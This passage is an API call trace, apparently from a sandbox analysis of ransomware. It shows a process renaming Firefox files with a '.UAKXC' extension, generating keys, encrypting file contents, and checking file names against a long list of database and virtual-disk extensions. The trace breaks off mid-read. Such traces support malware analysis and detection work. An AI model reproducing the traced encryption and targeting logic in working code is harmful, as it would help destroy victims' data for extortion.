[0140.201] CloseHandle (hObject=0x210) returned 1 [0140.203] GetProcessHeap () returned 0xea0000 [0140.203] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef8b20 [0140.204] lstrcpyW (in: lpString1=0xef8b20, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk") returned="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk" [0140.204] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk.UAKXC") returned="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk.UAKXC" [0140.204] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.chk"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk.UAKXC" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.chk.uakxc")) returned 1 [0140.206] GetProcessHeap () returned 0xea0000 [0140.206] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef8b20 | out: hHeap=0xea0000) returned 1 [0140.206] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeb30 | out: hHeap=0xea0000) returned 1 [0140.206] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed080 | out: hHeap=0xea0000) returned 1 [0140.207] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0140.207] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0140.207] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0140.208] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.ini")) returned 0x20 [0140.208] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0140.208] GetLastError () returned 0x0 [0140.208] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=1245) returned 1 [0140.208] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".4dd") returned 0x0 [0140.208] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".4dl") returned 0x0 [0140.208] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".accdb") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".accdc") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".accde") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".accdr") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".accdt") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".accft") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".adb") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".ade") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".adf") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".adp") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".arc") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".ora") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".alf") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".ask") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".btr") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".bdf") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".cat") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".cdb") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".ckp") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".cma") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".cpd") returned 0x0 [0140.209] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dacpac") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dad") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dadiagrams") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".daschema") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".db") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".db-shm") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".db-wal") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".db3") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dbc") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dbf") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dbs") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dbt") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dbv") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dbx") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dcb") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dct") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dcx") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".ddl") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dlis") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dp1") returned 0x0 [0140.210] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dqy") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dsk") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dsn") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dtsx") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".dxl") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".eco") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".ecx") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".edb") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".epim") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".exb") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".fcd") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".fdb") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".fic") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".fmp") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".fmp12") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".fmpsl") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".fol") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".fp3") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".fp4") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".fp5") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".fp7") returned 0x0 [0140.211] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".fpt") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".frm") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".gdb") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".grdb") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".gwi") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".hdb") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".his") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".ib") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".idb") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".ihx") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".itdb") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".itw") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".jet") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".jtx") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".kdb") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".kexi") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".kexic") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".kexis") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".lgc") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".lwx") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".maf") returned 0x0 [0140.212] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".maq") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".mar") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".mas") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".mav") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".mdb") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".mdf") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".mpd") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".mrg") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".mud") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".mwb") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".myd") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".ndf") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".nnt") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".nrmlib") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".ns2") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".ns3") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".ns4") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".nsf") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".nv") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".nv2") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".nwdb") returned 0x0 [0140.213] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".nyf") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".odb") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".oqy") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".orx") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".owc") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".p96") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".p97") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".pan") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".pdb") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".pdm") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".pnz") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".qry") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".qvd") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".rbf") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".rctd") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".rod") returned 0x0 [0140.214] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".rodx") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".rpd") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".rsd") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".sas7bdat") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".sbf") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".scx") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".sdb") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".sdc") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".sdf") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".sis") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".spq") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".sql") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".sqlite") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".sqlite3") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".sqlitedb") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".te") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".temx") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".tmd") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".tps") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".trc") returned 0x0 [0140.215] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".trm") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".udb") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".udl") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".usr") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".v12") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".vis") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".vpd") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".vvv") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".wdb") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".wmdb") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".wrk") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".xdb") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".xld") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".xmlff") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".abcddb") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".abs") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".abx") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".accdw") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".adn") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".db2") returned 0x0 [0140.216] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".fm5") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".hjt") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".icg") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".icr") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".kdb") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".lut") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".maw") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".mdn") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".mdt") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".vdi") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".vhd") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".vmdk") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".pvm") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".vmem") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".vmsn") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".vmsd") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".nvram") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".vmx") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".raw") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".qcow2") returned 0x0 [0140.217] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".subvol") returned 0x0 [0140.218] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".bin") returned 0x0 [0140.218] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".vsv") returned 0x0 [0140.218] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".avhd") returned 0x0 [0140.218] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".vmrs") returned 0x0 [0140.218] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".vhdx") returned 0x0 [0140.218] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".avdx") returned 0x0 [0140.218] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".vmcx") returned 0x0 [0140.218] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpSrch=".iso") returned 0x0 [0140.218] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.218] WriteFile (in: hFile=0x210, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.291] WriteFile (in: hFile=0x210, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.291] SetEndOfFile (hFile=0x210) returned 1 [0140.291] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.291] ReadFile (in: hFile=0x210, lpBuffer=0x4610000, nNumberOfBytesToRead=0x4dd, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: 